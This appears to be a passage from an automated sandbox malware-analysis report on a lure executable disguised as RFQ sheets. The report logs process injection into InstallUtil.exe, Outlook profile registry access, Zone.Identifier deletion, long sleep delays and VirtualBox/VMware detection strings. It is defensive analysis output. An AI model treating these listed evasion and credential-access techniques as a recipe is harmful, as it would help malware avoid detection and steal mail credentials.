Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.42e56b0.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.5620000.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.42e56b0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.5620000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4258950.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe.4215892.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.2475804920.0000000005620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2463896944.0000000003101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe PID: 7380, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_0665B381 push 5805D183h; iretd 0_2_0665B38D
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_0682BCF3 push ebp; ret 0_2_0682BD23
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Code function: 0_2_080BFD3A pushfd ; ret 0_2_080BFD41
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 5_2_06692DBE pushfd ; retf 5_2_06692DC1
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Static PE information: section name: .text entropy: 6.98396364188515
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | File created: \rfq sheets px2 mule25 shenzhen lucky.exe

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | File opened: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe\:Zone.Identifier read attributes | delete
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match | File source: Process Memory Space: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe PID: 7380, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Memory allocated: 16E0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Memory allocated: 3100000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Memory allocated: 5100000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Memory allocated: 8680000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Memory allocated: 9680000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Memory allocated: 9850000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Memory allocated: A850000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Memory allocated: ABF0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Memory allocated: BBF0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Memory allocated: CBF0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 2A30000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 2BA0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Memory allocated: 4BA0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599546
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599218
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 599109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598999
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598890
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598671
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598343
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 598011
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597906
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597796
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597687
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597468
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597356
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597249
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597140
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 597029
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596916
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596702
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596593
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596375
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596265
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596156
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 596046
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595935
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595828
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595718
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595609
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595390
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595281
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595171
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 595062
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594951
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594843
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594734
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594625
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594514
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Window / User API: threadDelayed 8280
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe | Window / User API: threadDelayed 1582
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Window / User API: threadDelayed 2527
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Window / User API: threadDelayed 7324
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe TID: 7632 | Thread sleep time: -36893488147419080s >= -30000s
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe TID: 7632 | Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160 | Thread sleep count: 39 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160 | Thread sleep time: -35971150943733603s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160 | Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8164 | Thread sleep count: 2527 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160 | Thread sleep time: -599875s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8164 | Thread sleep count: 7324 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160 | Thread sleep time: -599765s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160 | Thread sleep time: -599656s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160 | Thread sleep time: -599546s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160 | Thread sleep time: -599437s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160 | Thread sleep time: -599328s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160 | Thread sleep time: -599218s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160 | Thread sleep time: -599109s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160 | Thread sleep time: -598999s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160 | Thread sleep time: -598890s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160 | Thread sleep time: -598781s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160 | Thread sleep time: -598671s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160 | Thread sleep time: -598562s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -598453s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -598343s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -598234s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -598125s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -598011s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -597906s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -597796s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -597687s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -597578s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -597468s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -597356s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -597249s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -597140s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -597029s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -596916s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -596702s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -596593s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -596484s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -596375s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -596265s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -596156s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -596046s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -595935s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -595828s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -595718s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -595609s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -595500s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -595390s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -595281s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -595171s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -595062s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -594951s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -594843s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -594734s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -594625s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8160Thread sleep time: -594514s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598999Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598671Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598343Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598011Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597796Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597468Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597356Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597249Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597029Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596916Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596702Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596593Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596484Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596375Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596265Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596156Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596046Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595935Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595828Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595718Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595609Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595500Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595390Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595281Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595171Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595062Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594951Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594843Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594625Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594514Jump to behavior
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2475804920.0000000005620000.00000004.08000000.00040000.00000000.sdmp, RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxTray
                    Source: RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe, 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1607782515GSOFTWARE\VMware, Inc.\VMware VGAuth
